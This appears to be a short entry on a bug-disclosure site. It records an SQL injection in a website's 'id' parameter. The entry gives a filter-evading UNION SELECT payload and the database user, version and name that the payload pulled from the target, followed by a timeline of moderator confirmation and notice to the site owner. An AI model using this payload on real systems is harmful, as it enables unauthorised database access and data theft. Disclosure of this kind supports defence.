Detailed information Sql Inj /*!UNION*/ /*!SELECT*/ 1,0x3c68313e4d61727368616c6c3c2f68313e,user(),database(),version()--+-
Marshall Yazisinda Ashagida Olanlar
User : ameankpi_org@localhost
Version : 5.6.30
Database : ameankpi_org
21 October 2016, 14:05
Vulnerability status
Have not any information from source -
23 August 2016, 09:35
Vulnerability status
Sended e-mail to source about vulnerability -
28 June 2016, 17:24
Added point to Vulnerability
Moderator gave 8 point from 10 to vulnerability -
28 June 2016, 17:23
Vulnerability status
Confirmed by Moderator -
28 June 2016, 02:03
Vulnerability changed
Vulnerability " id= Parametr Sql Injection" changed -
27 June 2016, 02:09
Vulnerability added
Vulnerability added to BUGemot